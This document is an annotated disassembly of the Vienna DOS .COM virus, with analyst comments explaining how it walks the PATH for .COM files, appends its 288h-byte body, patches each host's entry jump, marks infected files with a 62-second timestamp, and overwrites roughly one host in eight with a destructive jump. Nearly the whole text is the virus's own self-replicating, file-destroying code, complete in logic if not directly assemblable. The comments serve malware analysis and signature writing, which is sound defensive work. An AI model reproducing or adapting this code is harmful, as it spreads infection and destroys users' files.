; disassembly of vienna-b1 virus
;
; analyst notes (listing left exactly as found; comments only):
;   * 16-bit DOS .COM image, Intel syntax, loaded at cs:0100h. this is a
;     disassembly listing, not an assemblable source: segment-override
;     prefixes are written as a separate "es" token, and everything from
;     start_of_variables on is a debug-style hex dump (address, bytes, and a
;     meaningless opcode decode of data bytes) rather than assembler text.
;   * layout of an infected host: a 3-byte jmp at 0100h (the original host
;     bytes are kept at var+0Ah), the host program, then the 288h-byte virus
;     body. the copy written into a new host is taken from var-1F9h (0119h
;     here) for 288h bytes, so var = body start + 1F9h in every host.
;   * "var" below = the variable area addressed through si (0312h in this
;     host; the immediate at label1 is patched per host, see label18 path):
;       var+00 saved DTA offset      var+02 saved DTA segment
;       var+04 host file time        var+06 host file date
;       var+08 host attributes       var+0A original 3 host bytes
;       var+0D 3-byte jmp stub       var+0E stub displacement (size-3)
;       var+10 "*.COM",0             var+16 cursor into PATH= (0 = exhausted)
;       var+18 end of directory part var+1A "PATH=" search key
;       var+1F filespec buffer       var+5F private DTA for find first/next
;       var+8A 5-byte far jmp written over the host on the destructive path
;   * behaviour visible in the code that a scanner can key on: only *.COM
;     files in the current directory and along PATH are touched; file size
;     must be in 0Ah..0FA00h; an infected file grows by 288h bytes and starts
;     with an E9 jmp to its end; its timestamp is put back with the seconds
;     field forced to 1Fh (62 s), and that marker is what makes the virus
;     skip a file it already infected (label12). roughly one host in eight
;     (seconds mod 8 == 0 at label16) is overwritten instead of infected.

jmp label1 ; host stub: the infected entry jumps over the host to the body
message:
db "ello, world!$" ;*************
mov ah,09h ;print string ; part of *
mov dx,message ;point to string ; original *
int 21h ;call msdos ; com file. *
int 20h ;terminate program ;*************

label1: ; virus entry (0119h here; this is the first byte of the 288h-byte image)
push cx ;
mov dx,0312h ;start of variables ; this imm16 (at 011Bh) is rewritten for each new host, see label18 path
cld ;clear direction
mov si,dx ;si = start of variables
add si,000Ah ; var+0Ah = the host's original first 3 bytes
mov di,0100h ;destination = 0100h
mov cx,0003 ;three bytes to move
repz movsb ; put the host entry back so the host runs normally at label3
mov si,dx ;si = 0312h (start of variables)
mov ah,30h ;get dos version number
int 21h ;call msdos ; al = major version
cmp al,00h ;old version? ; 0 = dos 1.x
jnz label2 ;no
jmp label3 ;yes ; dos 1.x: do nothing, just run the host

label2: ; save the host's DTA and switch to a private one inside the variable area
push es ;store extra segment
mov ah,2fh ;get DTA address
int 21h ;call msdos ; es:bx = current DTA
mov [si+0000h],bx ;save DTA offset
mov [si+0002],es ;save DTA segment
pop es ;restore extra segment address
mov dx,005fh ;
nop
add dx,si ;pointer to new DTA address ; var+5Fh; keeps the host's DTA untouched (restored at label6)
mov ah,1ah ;set DTA address
int 21h ;call msdos
push es ;save extra segment address again
push si ;save source index register
mov es,[002ch] ; psp:2Ch = segment of the environment block
mov di,0000h ; es:di scans the environment from its start

label4: ; locate "PATH=" in the environment block
pop si
push si ; si = var again (kept on the stack across the scan)
add si,001ah ; var+1Ah = "PATH=" search key
lodsb ;get byte from source address ; al = 'P'
mov cx,8000h ;
repnz scasb ; find the next 'P' in the environment (scans up to 8000h bytes)
mov cx,0004h ;
label7: ; compare the remaining "ATH=" against es:di
lodsb ;get byte from source
scasb ;compare byte at es:[di] with al (does not store)
jnz label4 ;jump back till done ; mismatch: keep scanning after this 'P'
loop label7 ; all four matched: di now points at the PATH value
pop si ;restore source index register
pop es ;and extra segment
mov [si+0016h],di ; var+16h = offset of the PATH value in the environment block
mov di,si
add di,001fh
mov bx,si ; bx = var for the label13/label5 code below
add si,001fh
mov di,si ; di = var+1Fh = filespec buffer, still empty
jmp label5 ; first search: current directory, filespec "*.COM"

label13: ; reached when find first/next reports no (more) matches: move to the next PATH directory
cmp word ptr [si+0016h],00h ; cursor 0 = PATH exhausted
jnz label5 ; as listed this jumps to label5 and bypasses the copy below; left as found
jmp label6 ; done: restore DTA and run the host
push ds
push si
es mov ds,[002ch] ; es: override; ds = environment segment from psp:2Ch
mov di,si
es mov si,[di+0016h] ; es: override; si = saved PATH cursor (var+16h)
add di,001fh ; di = filespec buffer (var+1Fh)
label10: ; copy one PATH element from the environment into the filespec buffer
lodsb ;get byte ; from the environment (ds = environment segment)
cmp al,3bh ; ';' separates PATH entries
jz label8
cmp al,00h ; end of the PATH string
jz label9
stosb ;store byte ; append the directory character
jmp label10
label9:
mov si,0000h ; no more entries: cursor = 0 (checked at label13)
label8:
pop bx ; bx = var (the pushed si)
pop ds
mov [bx+0016h],si ; remember where to continue in PATH next time
cmp byte ptr [di-01h],5ch ; directory already ends with '\'?
jz label5
mov al,5ch
stosb ;store byte ; append '\' before the "*.COM" pattern

label5: ; build "<dir>\*.COM",0 in the filespec buffer and start a search
mov [bx+0018h],di ; var+18h = where the found file name will be written
mov si,bx
add si,0010h ; var+10h = "*.COM",0
mov cx,0006h
repz movsb
mov si,bx
mov ah,4eh ;search for first match
mov dx,001fh ;pointer to asciiz file spec.-si
nop
add dx,si ;pointer to asciiz file spec.
mov cx,0003h ;attributes to use in search match ; 0003h = include read-only and hidden files
int 21h ;call msdos
jmp label11

label14: ; next candidate in the same directory
mov ah,4fh ;search for next match
int 21h ;call msdos
label11:
jnb label12 ; cf clear: a match is in the private DTA at var+5Fh
jmp label13 ; no (more) matches here: next PATH directory

label12: ; filter the candidate using the DTA fields (DTA+16h time, DTA+1Ah size, DTA+1Eh name)
mov ax,[si+0075h] ; var+75h = DTA+16h = file time, low byte in al
and al,1fh ; seconds/2 field
cmp al,1fh ; 1Fh (62 s) = infection marker set at label19
jz label14 ; already infected: next file
cmp word ptr [si+0079h],0fa00h ; var+79h = DTA+1Ah = file size (low word)
ja label14 ; too big: skip
cmp word ptr [si+0079h],0ah
jb label14 ; too small: skip
mov di,[si+0018h] ; di = end of the directory part of the filespec
push si
add si,007dh ; var+7Dh = DTA+1Eh = found file name (asciiz)
label15:
lodsb
stosb
cmp al,00h
jnz label15 ; copy name incl. terminator: filespec buffer now holds the full path
pop si
mov ax,4300h ;get file attributes
mov dx,001fh ;pointer to asciiz file spec. -si
nop
add dx,si ;pointer to file spec.
int 21h ;call msdos ; cx = attributes
mov [si+0008h],cx ; var+08 = original attributes (put back at label17)
mov ax,4301 ;set file attributes
and cx,0fffeh ;new attributes ; clear bit 0 (read-only) so the file can be opened for write
mov dx,001fh ;pointer to asciiz file spec. -si
nop
add dx,si ;pointer to asciiz file spec.
int 21h ;call msdos
mov ax,3d02h ;open file (handle) ; access mode 2 = read/write
mov dx,001fh ;pointer to asciiz file spec. -si
nop
add dx,si ;pointer to asciiz file spec.
int 21h ;call msdos
jnb label16
jmp label17 ; open failed: only restore the attributes

label16: ; file is open; decide between the destructive path and infection
mov bx,ax ; bx = file handle
mov ax,5700h ;get time and date
int 21h ;call msdos
mov [si+0004],cx ;store time
mov [si+0006],dx ;store date ; both restored at label19
mov ah,2ch ;get system time
int 21h ;call msdos ; dh = seconds
and dh,07h ; seconds mod 8 == 0 -> destructive path (about 1 in 8)
jnz label18 ; otherwise infect
mov ah,40h ;write to file or device (handle)
mov cx,0005h ;number of bytes to write
mov dx,si ;get file spec. address -8ah
add dx,008ah ;add 8ah to get file spec. address ; var+8Ah = 5-byte far jmp (see 039Ch in the dump)
int 21h ;call msdos ; overwrites the host's first 5 bytes: the file is destroyed, not infected
jmp label19
nop

label18: ; infection path: append the body and point the host's entry at it
mov ah,3fh ;read file or device (handle)
mov cx,0003h ;number of bytes to read
mov dx,000ah ;point to buffer -si
nop
add dx,si ;pointer to buffer area ; var+0Ah = host's original 3 bytes (restored at label1 by the new copy)
int 21h ;call msdos
jb label19
cmp ax,0003h ;number of bytes read
jnz label19
mov ax,4202h ;move file pointer
;offset from end of file
mov cx,0000h ;offset desired
mov dx,0000h ;as above
int 21h ;call msdos ; ax = file size (low word) after seeking to end
jb label19
mov cx,ax
sub ax,0003h
mov [si+000eh],ax ; var+0Eh = displacement of the E9 stub at var+0Dh: 0103h+(size-3) = 0100h+size = start of the appended body
add cx,02f9h ; cx = 0100h+size+1F9h = offset of the variable area in the new host
mov di,si
sub di,01f7h ; 0312h-1F7h = 011Bh = imm16 of "mov dx,0312h" at label1
mov [di],cx ; patch the image about to be written so the copy finds its own variables
mov ah,40h ;write to file or device (handle)
mov cx,0288h ;number of bytes to write
mov dx,si ;
sub dx,01f9h ;dx = pointer to buffer of data write ; 0119h = label1 = start of the virus image
int 21h ;call msdos ; append the 288h-byte body to the host
jb label19
cmp ax,0288h ;288h bytes written?
jnz label19
mov ax,4200h ;move file pointer
;offset from beginning of file
mov cx,0000h ;desired offset
mov dx,0000h ;desired offset
int 21h ;call msdos
jb label19
mov ah,40h ;write to file or device (handle)
mov cx,0003h ;number of bytes to write
mov dx,si ;
add dx,000dh ;pointer to buffer of data write ; var+0Dh = E9 + displacement: the host now jumps to the body
int 21h ;call msdos

label19: ; common exit for both paths: put the timestamp back, marking the file
mov dx,[si+0006h]
mov cx,[si+0004h]
and cx,0ffe0h
or cx,001fh ; seconds field := 1Fh (62 s): the marker tested at label12
mov ax,5701h ;set date and time
int 21h ;call msdos
mov ah,3eh ;close file
int 21h ;call msdos

label17: ; restore the attributes saved at var+08 before bit 0 was cleared
mov ax,4301h ;set file attributes
mov di,[si+0008h]
mov dx,001fh ;pointer to asciiz file spec. -si
nop
add dx,si ;pointer to ascii file spec.
int 21h ;call msdos

label6: ; give the host its original DTA back
push ds ;save data segment
mov ah,1ah ;set DTA address
mov dx,[si+0000] ;retrieve original DTA
mov ds,[si+0002] ;and data segment of dta
int 21h ;call msdos
pop ds ;restore data segment

label3: ; hand control to the host at 0100h (its first 3 bytes were restored at label1)
pop cx
xor ax,ax ;clear accumulator
xor bx,bx ;and bx
xor dx,dx ;and dx
xor si,si ;and si
mov di,0100h ;pointer to execution program to be
;run now virus has finished
push di
xor di,di ;clear di
ret 0ffffh ;? ; pops 0100h into ip; the imm16 then adjusts sp by 0FFFFh (intent unclear, as the original comment says)

; debug-style dump of the variable area (address, bytes, and a decode of the
; data bytes as if they were code; ignore the mnemonics). offsets are relative
; to var = 0312h; see the map in the header.
start_of_variables:
0312 80003E ADD BYTE PTR [BX+SI],3E ; var+00/+02: saved DTA far pointer (0080h = the psp default offset)
0315 40 inc ax
0316 D592 AAD 92 ; var+04: host file time 92D5h
0318 8511 TEST dx,[BX+DI] ; var+06: host file date 1185h
031A 2000 AND [BX+SI],AL ; var+08: host attributes 0020h (archive)

031C EB0E JMP 032ch ;jump address to place at ; var+0A: the host's original 3 bytes (EB 0E 48)
;beginning of source program
031E 48 DEC ax
031F E91600 JMP 0338 ; var+0D: the E9 stub written to 0100h of a host; displacement 0016h = 19h-3 (host was 19h bytes, cf. size at 038Bh)
db "*.COM" ; var+10 (0322h): search pattern appended to each directory
0327 0027 ADD [BX],ah ; 0327h: terminator of "*.COM"; 0328h = var+16: PATH cursor
0329 0022 ADD [BP+SI],ah ; 032Ah = var+18: end-of-directory pointer
032B 03
db "PATH=DANGER!.COM EM.COM" ; author's rendering of the bytes from 032Ch on
032C 5041 ADD dx,[BX+SI+41] ; var+1A (032Ch): "PATH=" search key
032E 54 push SP
032F 48 DEC ax
0330 3D4441 cmp ax,4144 ; var+1F (0331h): filespec buffer, here holding "DANGER!.COM"
0333 4E DEC SI
0334 47 inc DI
0335 45 inc BP
0336 52 push dx
0337 212E434F AND [4F43],BP
033B 4D DEC BP
033C 00454D ADD [DI+4D],AL ; left-over text from earlier searches
033F 2E CS:
0340 43 inc BX
0341 4F DEC DI
0342 4D DEC BP
0343 0000 ADD [BX+SI],AL
0345 43 inc BX
0346 4F DEC DI
0347 4D DEC BP
0348 0020 ADD [BX+SI],ah
034A 2020 AND [BX+SI],ah
034C 2020 AND [BX+SI],ah
034E 2020 AND [BX+SI],ah
0350 2020 AND [BX+SI],ah
0352 2020 AND [BX+SI],ah
0354 2020 AND [BX+SI],ah
0356 2020 AND [BX+SI],ah
0358 2020 AND [BX+SI],ah
035A 2020 AND [BX+SI],ah
035C 2020 AND [BX+SI],ah
035E 2020 AND [BX+SI],ah
0360 2020 AND [BX+SI],ah
0362 2020 AND [BX+SI],ah
1463:0364 2020 AND [BX+SI],ah
1463:0366 2020 AND [BX+SI],ah
1463:0368 2020 AND [BX+SI],ah
1463:036A 2020 AND [BX+SI],ah
1463:036C 2020 AND [BX+SI],ah
1463:036E 2020 AND [BX+SI],ah
1463:0370 2003 AND [BP+DI],AL ; 0371h = var+5F: the private DTA (search template "????????COM" follows)
1463:0372 3F AAS
1463:0373 3F AAS
1463:0374 3F AAS
1463:0375 3F AAS
1463:0376 3F AAS
1463:0377 3F AAS
1463:0378 3F AAS
1463:0379 3F AAS
1463:037A 43 inc BX
1463:037B 4F DEC DI
1463:037C 4D DEC BP
1463:037D 0305 ADD ax,[DI]
1463:037F 001F ADD [BX],BL
1463:0381 0020 ADD [BX+SI],ah
1463:0383 64 DB 64
1463:0384 7269 JB 03EF
1463:0386 20D5 AND CH,DL ; 0387h = DTA+16h (var+75h): found file's time, tested at label12
1463:0388 92 XCHG dx,ax
1463:0389 8511 TEST dx,[BX+DI] ; DTA+18h: found file's date
1463:038B 1900 SBB [BX+SI],ax ; 038Bh = DTA+1Ah (var+79h): file size 0019h
1463:038D 0000 ADD [BX+SI],AL
1463:038F 44 inc SP ; 038Fh = DTA+1Eh (var+7Dh): found file name "DANGER!.COM",0
1463:0390 41 inc cx
1463:0391 4E DEC SI
1463:0392 47 inc DI
1463:0393 45 inc BP
1463:0394 52 push dx
1463:0395 212E434F AND [4F43],BP
1463:0399 4D DEC BP
1463:039A 0000 ADD [BX+SI],AL
1463:039C EA0B021358 JMP 5813:020B ; var+8A: the 5-byte far jmp written over a host on the destructive path (label16); image ends at 03A1h = 0119h+288h